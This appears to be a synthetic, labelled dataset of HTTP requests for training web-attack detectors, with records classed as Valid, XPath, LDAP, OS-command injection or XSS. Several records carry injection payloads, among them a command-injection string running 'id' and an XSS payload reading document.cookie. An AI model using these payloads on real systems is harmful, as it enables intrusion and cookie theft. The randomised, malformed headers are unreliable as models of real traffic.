GET /o9a/stxVgojji_9xL./likewinntp4-KV/pudhvc/daLMwuNY/t@4mcF1lC/tOzuQmP.546q/DOYEc.html?geAtcaay44=08003&hlcm=%25rgs7&lni=fEi&Jarnxhz=i-in&2xStss=dbSp2T-InWS&N_B_mVlog=9377&wlred9hC8=8613787&el6ydfrote=aJauGG&oooeeeh4a=teFm&OiTwXLN=775925663 HTTP/1.0
Host: 133.201.219.188:80
Connection: keep-alive
Accept: application/*
Accept-Charset: utf-7;q=0.4, x-mac-japanese;q=0.6, koi8-r, x-mac-japanese
Accept-Encoding: 
Accept-Language: 4snar-t06oCsic;q=0.8, qr-xHAinsu
Cache-Control: max-stale=4
Client-ip: 2.86.141.83
Cookie: 3En4=]plu;et5s8gte=exe;ZBmdshutdownNfNu_=692397160;dadH=ooo;nf=e5egot
Cookie2: $Version="62"
Date: Sun, 20 Jun 04 15:55:34 CET
ETag: W/"iAz6haT@eiwQ40q"
Expect: ipszeL=aDh6oo;emsle3mm=r85wbeaa
From: 1ez9dnn@bsgxsssn.gov
If-Modified-Since: Fri, 05 Oct 07 05:39:37 GMT
If-Unmodified-Since: Thu, 06 Aug 09 13:00:39 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Mar 07 13:05:42 CET
Max-Forwards: 3
MIME-Version: 6.1
Pragma: eB='icennylR'
Proxy-Authorization: NTLM aWh3bmRkdG90eXVveDZoaGJnc25hd2lkblJMbGxyaWV4ZGFKdjU=
Authorization: Basic MWNncmg6bG5zc2xzaGU=
Range: 39-
Referer: /7hsEbyt/rhoxM9tl/STcym8z/ntytTsc/nahsij.png
TE: deflate,trailers,trailers
Trailer: From
User-Agent: phEdj1oNeR
UA-CPU: x86
UA-Disp: 4302,407,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 641x2619
Via: 6.1 11.211.122.216
Transfer-Encoding: gzip
Upgrade: btsTai/0.7, ltOC/6.6, 3ee/0.5, av5o/8.4
Warning: 708 www.enuapiro.htm "tlasiaAtvhw3Eauu" "Tue, 27 Jan 09 20:51:11 UTC"
X-Forwarded-For: 41.168.99.7
X-Serial-Number: 734922688511109
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29521
Start - Id: 5337
class: Valid
PUT /oVOthsCwmekQsJ9R.9/2W0Hp/NoajYbw5re4nsn/io1S/NhaiCoiepap4ghjdxo/4TFD/9AXd/gT_GN/2mln9r9Y.f/nianAslasglri8Sxe9/njsss1.tiff? HTTP/1.0
Content-Length: 126
Content-Language: eoost,Tec2of
Content-Encoding: identity
Content-Location: /clapq.php3
Content-MD5: bmlvQXRyY2xtZXZoNkhpbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Feb 04 13:16:23 CET
Last-Modified: Sat, 09 Apr 05 14:50:41 CET
Host: www.6pcir.cz
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.5, windows-1250;q=0.1, iso-8859-2;q=0.3
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: wcdeIStW=et
Client-ip: 225.208.7.131
Cookie: wq2etryeq94ays=aege;UehtnfpLrd=eeogo;droeld=esdfpnsi4itsnnrydqt
Cookie2: $Version="847"
Date: Sun, 21 Sep 08 10:31:30 GMT
ETag: W/"ZO1FlMmbAnlE3K6"
Expect: 100-continue
From: ozRSepFs@eAsemz.it
If-Modified-Since: Thu, 12 Jan 06 19:33:44 GMT
If-Unmodified-Since: Thu, 10 Jun 04 20:15:00 GMT
If-Match: *
If-None-Match: *
If-Range: "e_Sd26igmaIZKmN"
Max-Forwards: 56
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="tcbn"
Authorization: Digest nonce
Range: 479-767403,385484-73
Referer: http://www.jips.de/Tp8ls/CNtoe7/die2ftt/llery.mpg
TE: gzip,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: a3ePKsw http://www.ehfhsai.de
UA-CPU: Sparc
UA-Disp: 7479,767,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6579x971
Via: 0.7 www.dd8ehe.html:40851, 9.8 132.197.99.20
Transfer-Encoding: compress
Upgrade: ha2am/4.4, oYil/3.5, hudA/1.9, pre/2.7
Warning: 447 www.AoiT.html "ellptootAlwpn4" "Thu, 03 Mar 05 11:10:59 GMT"
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 0742335633125
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

fi0chr=g9fpasswdellrIgrrietc$cmdyo&tnnss8eateacm9=6&dcdwqbcenahI=61590&teu3s9rzt=58956&7so8lrtH3a=6fjarKod&1hhtemfto=Lt0Weie

End - Id: 5337
Start - Id: 49019
class: XPathInjection
GET /eioTgVHS85GAhQW/cjcmd0Fgroup by5Vv/a@_x/eNmbkbvodmaexqi/Y0processing-instructionkTexec/D5lTr3inputX/e9jhyIiuriN.gif?w0TrSE2=ne%27csolKaj&nh5itaiase=oreb%27+or+++E6e%2F5%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D42%5D++++or+%27use%27++++%3D%27 HTTP/1.0
Host: 109.202.87.148:0872
Connection: close
Accept: */*
Accept-Charset: macintosh, x-mac-chinesesimp
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.7
Cache-Control: ff0rFeau=d3
Client-ip: 5.173.173.39
Cookie: 7OVp8JXstdinn1=ypfssp3go;3iudtzi2nm8=rmwch5oozbgpzo;tir8ttsue3tne=357;1ceemateegizx8=8838;jeholwmcalumoi=jtAnnrsbitsreae;qgtebtpeSu=rr
Cookie2: $Version="4"
Date: Sun, 08 Apr 07 10:08:15 CET
ETag: "hqas.qShK2Qyew_tqh"
Expect: dv3LLuo=wcrI;nwnh8h=xenroahc
From: oshet@mw1oE1t.com
If-Modified-Since: Sat, 27 Jun 09 23:17:44 GMT
If-Unmodified-Since: Mon, 15 Jun 09 20:16:34 UTC
If-Match: "@1be1Cv0FXPDVRArz"
If-None-Match: *
If-Range: Sun, 20 Aug 06 13:14:14 CET
Max-Forwards: 70
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest username="ehcteu"
Authorization: NTLM QXJhdGV0SGVmdmZ6czNyZEVveldvYWc3c2hpeU5sZWVzVGk1cWFoNjd3ZA==
Range: -31
Referer: http://7Ctj0oo.com/lqEcsj/snms1tg/ueyqEhwd/e5uhnee5.js
TE: chunked;q=0.7,chunked
Trailer: Host
User-Agent: e4thexmr
UA-CPU: 68000
UA-Disp: 119,4854,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 9.9 www.5somugrc.jpg:60
Transfer-Encoding: deflate
Upgrade: l7T/6.8, egesr/9.6, aotEhh/5.3, leolo/7.4
Warning: 720 242.255.165.22 "tOitnuAIte3" "Sun, 01 Apr 07 23:33:20 GMT"
X-Forwarded-For: 216.15.10.143
X-Serial-Number: 544350626543951868
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49019
Start - Id: 3244
class: Valid
GET /SJn/oylSq6QQF6Z/eoptvKbgsoundsock_streamw8.var9@Y/rtzFy6264v/33Qcu2.asmx?la3hiefo=dwba6ah9eit3 HTTP/1.1
Host: www.uleldrnl.be:80
Connection: odr3we
Accept: */*;q=0.6
Accept-Charset: x-mac-chinesetrad, x-mac-korean, euc-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 112.59.59.14
Cookie: OVq40lV77=winputpa ertd1Shhik;trSszonptntln8o=or
Cookie2: $Version="39"
Date: Wed, 21 Jan 09 24:09:20 UTC
ETag: "Mpe.8n2Qm9RRdSN"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Sun, 24 Jan 10 16:37:53 CET
If-Unmodified-Since: Sat, 17 Apr 10 01:44:34 GMT
If-Match: *
If-None-Match: "iEq.flR8iROa-Mt8pu"
If-Range: Wed, 08 Sep 04 01:54:51 UTC
Max-Forwards: 84
MIME-Version: 6.0
Pragma: hTha='ge'
Proxy-Authorization: mdtd4r Mierh=aeru9Ogt
Authorization: Basic aW93cm0ycTpsc3dv
Range: -0418,8-
Referer: http://ytaj7.be/ssssb/athxYN/tfqyih/ieeAnhOn.avi
TE: gzip,trailers
Trailer: Authorization
User-Agent: rlafRt (oMFGZ8; aa_j0V6sj)
UA-CPU: StrongARM
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 796x812
Via: FTP/8.9 248.227.181.240, HTTP/3.3 198.93.213.59, trt/3.3 www.hsfwKuus.css:733
Transfer-Encoding: 2sqe; pitrww7s=mreUAah
Upgrade: m2sia/0.4, ltolt/9.3, r9eb/4.7, shc6de/5.3
Warning: 802 www.oaete.png "o4sslh" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 3244
Start - Id: 38018
class: LdapInjection
GET /erkkZmIq/r7.xcE/formC/aPLBQFSzxo2epi7b/svCD/fn5xaaFrevidqEm/3@uu76documentAAscriptu/ibVb.pl?siafaaEtroipj=8511156&kei=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&he3=u_K6lIWW&ehgtWagicu5ts=ysregfl0etukhiu&rmbhptsa=230880&.0VK2=sRohsy&ysirejrerasi=tdf8&3choid=eyXCgll8eo8Ot HTTP/1.0
Host: www.e9oqel.cz:80
Connection: close
Accept: video/*, video/mpeg;q=0.3, text/*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.5, deflate, identity;q=0.8, compress, gzip;q=0.6
Accept-Language: ut9et-rdna;q=0.6, uftsv-SvnU;q=0.0
Cache-Control: min-fresh=943
Client-ip: 204.64.18.91
Cookie: hl9nZrnniyPtl=ftett8htif
Cookie2: $Version="3"
Date: Wed, 18 Nov 09 06:39:25 CET
ETag: "zGwbkaD56y2_UjA"
Expect: 4taRX=risno5L4
From: 8nlhbept@3gle.ch
If-Modified-Since: Thu, 04 May 06 03:30:59 UTC
If-Unmodified-Since: Sun, 31 May 09 19:13:56 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 986
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: ziaee2 vttV0aet=bileft6
Authorization: NTLM b3R5b3RhdGVudWQ4YWhpWWJvZXN0bWlmb2h0MkNPdmtzZWU=
Range: 28-,220237-8,8-
Referer: /Infye/si8za/isire.zip
TE: trailers,chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: esfjTto5e
UA-CPU: Sparc
UA-Disp: 8564,925,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: FTP/4.4 www.le6gn.html, swktd/1.5 www.EW4tetl.jpeg
Transfer-Encoding: deflate
Upgrade: obs/0.4, gbr/5.8
Warning: 576 www.4exea.gif "s8oN" 
X-Forwarded-For: 195.229.142.172
X-Serial-Number: 9679089566014
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38018
Start - Id: 25546
class: Valid
GET /cAS@7VVD7m_./tdRX2Benwl1/NI/ufI7/mcii7tne/vnullPexeckZMmpT/hJ4EaiysCh/ro_A7MP99eU16Y/StQ.EgSgbc2stdin-g.htm?itdsia=5364882&tog=i3 HTTP/1.1
Host: 175.118.146.34:5250
Connection: keep-alive
Accept: image/png;q=0.0, text/*
Accept-Charset: x-mac-arabic;q=0.6, utf-8;q=0.7, utf-8;q=0.1, iso-8859-3;q=0.8, iso-2022-jp;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: min-fresh=3
Client-ip: 22.166.212.236
Cookie: x9Pigjrpasswddy= ~;imiotoTEiean=tvautd;R8eeKto=p idh;dnnez=adMQOWiaU6;lwnenaal4bR=ceteja0sa;dspSvej=5938607
Cookie2: $Version="1"
Date: Sun, 03 Jun 07 14:37:58 UTC
ETag: "mOMJGceCtu4wpuNPZ9"
Expect: iorogo
From: iisl@HkElln.cz
If-Modified-Since: Fri, 09 Jun 06 10:38:09 UTC
If-Unmodified-Since: Wed, 09 Aug 06 20:36:33 GMT
If-Match: "JVzzeJHE6WS9Bk5"
If-None-Match: "j2gBJjH416wJS4AlHdx"
If-Range: *
Max-Forwards: 4
MIME-Version: 6.4
Pragma: feArs='aceoset'
Proxy-Authorization: ntlrt msoetln=heso
Authorization: she0tk Ctarti3o=uhrc
Range: 9-,-76849,526527-658
Referer: /lsiirn/acgerri/1leo/lccsn9/ma6T.html
TE: gzip
Trailer: Trailer
User-Agent: 0HmuioN (fNMugkmC@; yk7UFqr; hm7jhZLN; tJTO2Isdw)
UA-CPU: MIPS
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8556x2731
Via: FTP/4.5 162.253.74.197, 0.0 165.33.162.106
Transfer-Encoding: gzip
Upgrade: Nu1w/8.6, l3aK/7.7
Warning: 142 222.56.226.72 "tngnIadabbtID" 
X-Forwarded-For: 161.67.138.114
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25546
Start - Id: 10019
class: Valid
GET /tQ4/nNcAxRIUtRFh2BCk9-kg/kr/el6M/8eEbtJNmXSzjbxRN/7oiZri98CBibQTD/oBq@T.ORZvphj8O-/gn2Wa0loPnkqmebHXxv./sthothaefym7nr2tnwh.swf?saeXntxvt=ras8teemochauao%3Fwindow.open&Wobject%uMcopy5B3KC=ptrnowtr&xyabJItobe=9i+ic HTTP/1.1
Host: 4.34.253.214
Connection: tefwt
Accept: video/*;q=0.4, application/rtf;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=7
Client-ip: 230.4.173.142
Cookie: R5oi=tLQXWIRN;tn8rtsfh2entdTd=l0reoc;ouaeoddUie4el=aeahg;aerit5;y44Nono0B=92188;l3rte=a1zBTRFameO
Cookie2: $Version="927"
Date: Sun, 29 Nov 09 15:08:21 GMT
ETag: "37Du@YuAnBeW63f@"
Expect: 100-continue
From: ma7sea1@tueds.com
If-Modified-Since: Sun, 04 Apr 10 17:56:06 UTC
If-Unmodified-Since: Sun, 03 Sep 06 20:13:47 UTC
If-Match: *
If-None-Match: "MnOV8FmO.zAsM@Qe"
If-Range: "bBMmfvHNkTF317_6."
Max-Forwards: 0
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: NTLM bWFyM3RTbWVzc2NxNXJlbnJhYWVhc3Ryb2RkWmVzMHNhcGltcm5CaWxzRVNncg==
Range: 7-,1-2,575-73
Referer: /rgnoTs/thps.mspx
TE: gzip,deflate;q=0.3,chunked
Trailer: Connection
User-Agent: eomnonzbebtvOyu1mdr
UA-CPU: 68000
UA-Disp: 0205,052,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 470x7016
Via: 2.3 www.56nfo.html
Transfer-Encoding: compress
Upgrade: Xen/3.6
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 21316010619533
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10019
Start - Id: 43097
class: OsCommanding
GET /nh3f2/Agfgs2ro/t7Zdof_mpPdBY.jsp?whee=lB7mqQqh4z&tioedlgtboIf=%7C+echo++++%22++++Content-Type%3A+text%2Fhtml%22+++%3B+++++echo++++%22%22++%3B+id++%5C0&E9N.w=c%3C%5B&PO.BD=i7Bab&fhelnlNe=aloz6&iidwss=%3F&aNsmo0louGu8a=o&seatgm6=tsc&Ioh1l=1&8rid=toAgawm&cxS9DMi=Awnaeueoosg&n5RJguJVcxchild=500930&bmgc=916040&BeMT=1367819 HTTP/1.1
Host: 19.192.217.84:8
Connection: close
Accept: video/*;q=0.1, image/*, video/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.2, identity
Accept-Language: iyw-imlsa;q=0.0, sIrhS7-mj5meept, uCmadt-ri;q=0.0, Nrnae-pgrn;q=0.2, cGeynk-s1knLsk0;q=0.1
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: aieiotha=yq0trgert;sopmEza=aobjecthec;0akOMixWOm7L=d_k
Cookie2: $Version="127"
Date: Mon, 10 May 04 06:50:43 GMT
ETag: "7fMIFPet.bIBWEJyH"
If-Modified-Since: Fri, 19 May 06 09:52:35 UTC
If-Unmodified-Since: Tue, 30 Jun 09 14:40:19 UTC
If-Match: *
If-None-Match: "bThz1EV8KtvYztG-D4"
If-Range: *
Max-Forwards: 274
MIME-Version: 1.3
Pragma: utogitrL=s
Authorization: Basic ZWx3dG86cHVsc3U=
Referer: http://twenoth.de/araemf/srehe/ldsfufpa/tktoNvsH/nsdei.sh
TE: deflate
Trailer: If-Modified-Since
User-Agent: ondMetc1aau9ntEn9A
UA-Disp: 418,932,32
UA-OS: Solaris
Via: HTTP/2.1 www.5sonfb.png, FTP/8.3 188.35.128.161
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 298 115.136.93.240 "Lgso" 
X-Serial-Number: 306986025864028
----: ------------------------------------------------

null

End - Id: 43097
Start - Id: 2921
class: Valid
GET /ggbTVQXUknDtdb/ueereIetererdnodin/motnsB.asmx?u97ie8t=924&@LboXX.cboot.inin=%26lixtermpositionrthttpf8Oisauly&ea0ai=sTNJ0x-H&0tettra=sA+liBjuytNc&iX1=854561 HTTP/1.0
Host: 123.160.131.165
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-ce, iso-8859-1;q=0.8, windows-1254;q=0.7, windows-1253;q=0.1, x-mac-chinesetrad;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=5
Client-ip: 178.131.142.114
Cookie: shIPyt=a;usrqYusrRhBI=c;ebmesanmec6aa=ocfh0vo;sgOE=7096;eta3ojyamre=75231945;.orOA=e3  
Cookie2: $Version="0"
Date: Thu, 06 Aug 09 11:45:14 UTC
ETag: "NYIx.zUUhySESjCSVLgJ"
Expect: ySha9
From: qg1rhg@3iIi.de
If-Modified-Since: Wed, 14 Jan 09 03:44:27 GMT
If-Unmodified-Since: Fri, 10 Jun 05 15:00:07 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 08:33:35 CET
Max-Forwards: 1475
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=rieTn
Authorization: Digest cnonce="inl3s"
Range: 8-0812,200838-406
Referer: http://lhcrr.com/eeiyot/tLhtos/lstn/cem7ecl/iutg.avi
TE: trailers,trailers
Trailer: Trailer
User-Agent: nTsHndeOV1 (eK8SDD; eMWqgFwDH; eE8u0oE; eWTmPW; sYjUyp4s)
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 640x6169
Via: FTP/1.6 www.gidcbt.css
Transfer-Encoding: identity
Upgrade: aqeAe/2.5, uaisaa/2.3
Warning: 530 www.zisn.js "a3sxuae" "Sun, 09 Jul 06 13:08:32 GMT"
X-Forwarded-For: 88.122.68.80
X-Serial-Number: 369098757505343425
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2921
Start - Id: 37556
class: LdapInjection
PUT /95ffwaDiobn2j@7eMg/nttDnwSyorOrxsEeouo/waae/acruotiz/wedcCeeeshceoe/qhmdits/n_RiPQKf@79l9H/tior6indeyniztkmeehe/saforme3q/aeein0obx/mNh1Tns12/tP4k9V@.BihCd.html? HTTP/1.0
Content-Length: 171
Content-Language: aeaf
Content-Encoding: identity
Content-Location: /zcsxn.shtml
Content-MD5: d3JlYmMxZXQ1YnJFYXNtYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 17 May 04 04:09:46 CET
Last-Modified: Sun, 03 Jun 07 03:02:09 CET
Host: www.Crcy9H.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: Isebtc-eq, jedC-ch;q=0.0, iedlre-mrn;q=0.7, 3Nnar-aEVe;q=0.6
Cache-Control: max-stale
Client-ip: 30.21.196.2
Cookie: sOomnmz4s=tihr7ue;4iurcleomtdsh5E=QaeonullkfJt];lsDy=174655;We.WWphpcuj5X-=203
Cookie2: $Version="00"
Date: Tue, 15 Jan 08 21:45:22 UTC
ETag: "DKMeyFEGPC-DDbSpr"
Expect: ontekast
From: oenu@5hnawusete.de
If-Modified-Since: Fri, 03 Oct 08 21:29:41 CET
If-Unmodified-Since: Tue, 09 Nov 04 03:04:38 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "w5qO6lXigKlPybS3TT3"
If-Range: *
Max-Forwards: 7673
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtsrac"
Authorization: Basic Y2pnTjpzZWFTdw==
Range: -78728,9752-,0169-21
Referer: http://apeeuat.uk/asp5waNE/CS5Eofa.asmx
TE: deflate
Trailer: If-None-Match
User-Agent: ekM19HyR_ http://www.ecngl.st
UA-CPU: MIPS
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1680x065
Via: 7.5 www.isna.png:1886, 2.8 www.3mnbaFud.htm:2142, HTTP/2.3 136.81.171.230
Transfer-Encoding: tireo
Upgrade: etMr/2.7
Warning: 384 59.186.228.229 "atuGyeetiitsHF" 
X-Serial-Number: 01594707388200191754
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

riaidRckxrdtg=73439674&netcatuG4nvySformnG=idThETzntha&z3GNbp=697275&YwrN=seyoeehtcoo&ci7OeL7isa1sou=4509&oinvhpsx=90999140&Rno7aaWschbas5O=) (  |    (er=csT*)

End - Id: 37556
Start - Id: 28162
class: Valid
GET /w3JLdbt293ojEJ6./l--8X/re4BOz/adreraiogn7eiaAtp/hshaissy7hseigdlli/o9pH_/IUww8cLh1q/wel/7Ypf.M.6/sjoweiosK0.cfm?7rL@JHqH_@=5&tnae=eobIHvXXf&DQ9Y9Iwp-boot.ini=req%3D%3F HTTP/1.1
Host: www.ecicaso.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-15, cp-950;q=0.4, euc-cn;q=0.7, euc-cn
Accept-Encoding: *
Accept-Language: rddosoAi-i9ru;q=0.7
Cache-Control: no-store
Client-ip: 46.221.229.5
Cookie: Zhg=1eAdreThEae;OnEhase=62096553;nhsiel3stspils=061637
Cookie2: $Version="8"
Date: Thu, 26 Jul 07 12:17:05 UTC
ETag: "IYFbmj-yx5IeQqAN5f"
Expect: cmGhof4A=ehaaa;godae
From: onho1m@erOigaeew.uk
If-Modified-Since: Tue, 09 Dec 08 08:37:20 CET
If-Unmodified-Since: Thu, 21 Jul 05 11:37:53 GMT
If-Match: "e6jtbLVD3HmgPFYRWK"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=etenhn
Authorization: Digest response="cE53fe2F4B5D90F9F56cD9DbE58FFE9a"
Range: -4262
Referer: http://www.rasbtnc.it/beTnoo/Sdhi1uk/gsalcxi5.txt
TE: chunked,gzip,chunked;q=0.0
Trailer: Accept-Language
User-Agent: h0o9YVZTx4 http://www.aioekn.be
UA-CPU: Sparc
UA-Disp: 166,4722,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4261x691
Via: 2.1 www.Dnpoe.shtml
Transfer-Encoding: 5ueboL
Upgrade: atream/5.4, ueGrn/9.3, 8jitoo/8.1
Warning: 403 120.108.130.1 "ai8tfnnlo4okAislt" "Wed, 10 Jan 07 06:01:10 GMT"
X-Forwarded-For: 53.152.98.70
X-Serial-Number: 90040752816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28162
Start - Id: 22162
class: Valid
GET /g0bQXIzsN5p7dyR340/6g92nQK.hQk/eekA/y7/eI4DaEJwc/onet4si52faksesute5u/e2ehntt5me9r/a-jZp.GOxzTKI/QZall.js?isrei9=wwtawgnihhneou&s88peymbm=%5Cmocha9&9catOaWa=lramochae&g3cllucewr=A5aeihb&u4zppi=vT1ldhd&gsa=siiSSboNprii%5D%2B&srfeasvoieI=zhVFD4_dpyle&6d694aqpabi5e=waanracceptqeesIbb9&fhieca=nodeaos4v&dsci=6&cgcestn2Qdelete2sock_stream=oiadsHnL%3Bd&trs=94480&Ce0HHEQQ=EbotsentnyOoa&s0acsksejotlb5=hz+mqcrhimsd&chEtaerhnodn=tni HTTP/1.1
Host: 110.242.104.30
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.9, iso-8859-3
Accept-Encoding: gzip, identity;q=0.9, identity;q=0.4
Accept-Language: pleae4-t1t, taRc-bi3;q=0.3, sm-ab
Cache-Control: no-transform
Client-ip: 89.171.39.14
Cookie: l46ol4qr30e=3;yciS=bsYlidces8oke94;m9heae3raRiie=hkXZFnjO65D
Cookie2: $Version="7"
Date: Sun, 15 Nov 09 08:28:46 UTC
ETag: "NTsSwj9w298.VAu"
Expect: dooUiouQ=sulN
From: wiKeelga@iawciImato.be
If-Modified-Since: Mon, 15 Dec 08 11:33:33 UTC
If-Unmodified-Since: Sun, 17 Jul 05 22:23:12 CET
If-Match: *
If-None-Match: "pbZtjHPWP0mIWCj4"
If-Range: Sun, 15 Oct 06 15:25:53 CET
Max-Forwards: 4
MIME-Version: 1.6
Pragma: 8='t'
Proxy-Authorization: frls dscr=zajryd
Authorization: Basic eW5pbkNhaHQ6MzJzZWls
Range: -8,26857-
Referer: http://www.ofbo.fr/naran0/eteY/ls2n/onbo.jpg
TE: trailers,gzip,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.1 (Windows; U; WinNT 8.8; Hm-t3; rv:1.7.8) Gecko/76532815
UA-CPU: x86
UA-Disp: 863,374,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 355x1330
Via: antin/0.0 www.enoop.htm
Transfer-Encoding: xnn8u; titbj=ni1so7b
Upgrade: mlh9t/0.0, eyObma/1.0, apna/7.4
Warning: 398 124.40.7.234 "EEnlnaotsirs0" "Fri, 15 Oct 04 03:31:48 GMT"
X-Forwarded-For: 77.46.33.144
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22162
Start - Id: 19868
class: Valid
GET /s-shHHV/BJUallrQpDXa8_BO/cVE3y6xxbV/8detm/ejZBXhttps/6YAi30ChOja77.dmZ/heachdwE1hiot/vmorlheH/6rh3/AnIT/aNcVt9xtAMgbiYlu/eS3Z_QtOOqeTQvIM@m-.png? HTTP/1.0
Host: www.sn39ihl3od.be:8084
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: 5hnado-rgNwae
Cache-Control: max-stale=91
Client-ip: 169.241.81.8
Cookie: EuTnsueeECnm=weBIaMBa.;tmp3Bv=0731;bSooeaissz7=etcadocumentuei|6;ealH6wfaobqntel=ee4 dbEl ;xterm6r71xb=4FYs0Qz
Cookie2: $Version="4"
Date: Wed, 15 Mar 06 06:30:24 UTC
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 18 Apr 04 13:20:12 CET
If-Unmodified-Since: Sun, 05 Sep 04 16:25:04 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Oct 08 15:05:05 UTC
Max-Forwards: 11
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic YXRkcFRlZTpuc0UyZW5pbA==
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
Referer: /Uateir/mnMde/Yteh5a.aspx
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/8.3 (X11; U; Open BSD i586 8.7; pC-ps; rv:5.4.2) Gecko/32971471
UA-CPU: StrongARM
UA-Disp: 8005,879,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/9.2 98.202.222.16, 0.6 182.84.33.203, 7.6 www.mcohttt.jpeg
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 72392251969185668
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19868
Start - Id: 47998
class: XSS
GET /roe6Ii4tt/ePi0ssIsnu/c3lereilIeetunnoeo/yCh/eoaaq0/ahNb8Pn@7M/3nemzehuee/iq9R.Gv103YL0IALoC_/JGs7unwth2uarty.jpeg?o5aoyhmadjco=saaytd%22+++%3E%3Cbody%2520onload%3Dalert+%28document.cookie%29%3B%3E&9tajfa=9aMtA99 HTTP/1.1
Host: 252.62.244.4
Connection: eli5b
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: Nhf-sE;q=0.4, 9cvrhbcr-yub3axl, oteh-h2ocuco6;q=0.6, n-lk;q=0.9, t-rt;q=0.3
Cache-Control: no-store
Client-ip: 200.176.81.45
Cookie: hel=owp-;rglgqt=rnO;BM2Hlhpmeta=;t;mnumeepGtpmrt=child xlead6s ok2t
